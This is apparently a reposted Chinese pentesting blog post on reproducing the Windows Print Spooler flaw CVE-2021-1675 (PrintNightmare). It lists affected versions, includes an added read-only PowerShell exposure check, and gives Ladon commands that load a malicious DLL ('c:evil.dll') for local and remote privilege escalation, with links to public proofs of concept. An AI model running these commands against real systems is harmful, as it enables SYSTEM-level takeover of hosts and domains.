[Privilege Escalation] Reproducing the Print Spooler vulnerability CVE-2021-1675 with Ladon

Penetration techniques 2 years ago (2021) admin

Overview

Windows Print Spooler privilege escalation vulnerability, CVE ID: CVE-2021-1675. An unauthenticated remote attacker can use this vulnerability to execute arbitrary code with SYSTEM privileges on a domain controller and thereby take control of the entire domain. Affected users are advised to install the vendor patch promptly, inventory their assets, and put preventive measures in place to avoid being attacked.


Vulnerability description

Print Spooler is the Windows service that manages printing-related tasks.

Under suitable conditions in a domain environment, this vulnerability requires no user interaction: an unauthenticated remote attacker can use it to execute arbitrary code with SYSTEM privileges on a domain controller and thereby take control of the entire domain.


Affected versions

Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version 2004 (Server Core installation)
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
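The overview above advises affected users to patch and inventory their hosts. The following read-only check, written for this page as an added example and not code from the original post or from the Ladon project, reports the Print Spooler service state, flags a domain controller that still runs the spooler, and compares the Point and Print policy values against Microsoft's hardening guidance (KB5005010); it assumes an elevated PowerShell 5.1 or newer session.

```powershell
# Added example (not code from the original post or from the Ladon project):
# read-only CVE-2021-1675 / PrintNightmare exposure check for the local host.
# Assumptions: run in an elevated PowerShell 5.1+ session; the expected
# Point and Print values follow Microsoft's guidance in KB5005010.

function Get-PrintNightmareExposure {
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. Service state. A stopped and disabled spooler removes the attack surface.
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    if ($null -eq $spooler) {
        $findings.Add('Spooler service not installed')
    } else {
        $findings.Add("Spooler is $($spooler.Status) (StartType=$($spooler.StartType))")
    }

    # 2. Domain controllers should not run the spooler at all
    #    (Win32_ComputerSystem.DomainRole 4 = backup DC, 5 = primary DC).
    $role = (Get-CimInstance -ClassName Win32_ComputerSystem).DomainRole
    if ($role -ge 4 -and $spooler -and $spooler.Status -eq 'Running') {
        $findings.Add('FLAG: domain controller with Print Spooler running')
    }

    # 3. Point and Print policy values. A value of 1 for the first two weakens
    #    the host; RestrictDriverInstallationToAdministrators must be 1 (it is
    #    the default when absent on a patched system) to block non-admin
    #    driver installation.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
    $expected = @{
        NoWarningNoElevationOnInstall              = 0
        UpdatePromptSettings                       = 0
        RestrictDriverInstallationToAdministrators = 1
    }
    foreach ($name in $expected.Keys) {
        $actual = (Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue).$name
        if ($null -eq $actual) {
            $findings.Add("$name not set (policy value absent)")
        } elseif ($actual -ne $expected[$name]) {
            $findings.Add("FLAG: $name=$actual, expected $($expected[$name])")
        } else {
            $findings.Add("$name=$actual (OK)")
        }
    }
    return $findings
}

Get-PrintNightmareExposure
```

Lines prefixed with FLAG are the ones to act on; an absent policy value is reported rather than assumed safe, because it only means the default applies.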


Version

Ladon >= 8.6

Usage

Ladon CVE-2021-1675 DllPath

Examples

Ladon CVE-2021-1675 c:evil.dll
Ladon PrintNightmare c:evil.dll


The DLL can be generated with LadonGui; see the following for usage:

0day generic DLL generator: MS17010 demo


Local privilege escalation

Win2019 (screenshot in the original post, not reproduced here)

Win2016 (screenshot in the original post, not reproduced here)

Win10 (screenshot in the original post, not reproduced here)

Remote privilege escalation

Win2016 (screenshot in the original post, not reproduced here)


Related PoCs

C++, Python, C#, PowerShell
https://github.com/afwu/PrintNightmare
https://github.com/cube0x0/CVE-2021-1675
https://github.com/calebstewart/CVE-2021-1675




Originally published on the WeChat public account K8实验室 (K8 Lab): [Privilege Escalation] Reproducing the Print Spooler vulnerability CVE-2021-1675 with Ladon

Copyright notice: published by admin on 4 December 2021 at 00:18.
When reposting, please credit: [Privilege Escalation] Reproducing the Print Spooler vulnerability CVE-2021-1675 with Ladon | CTF导航
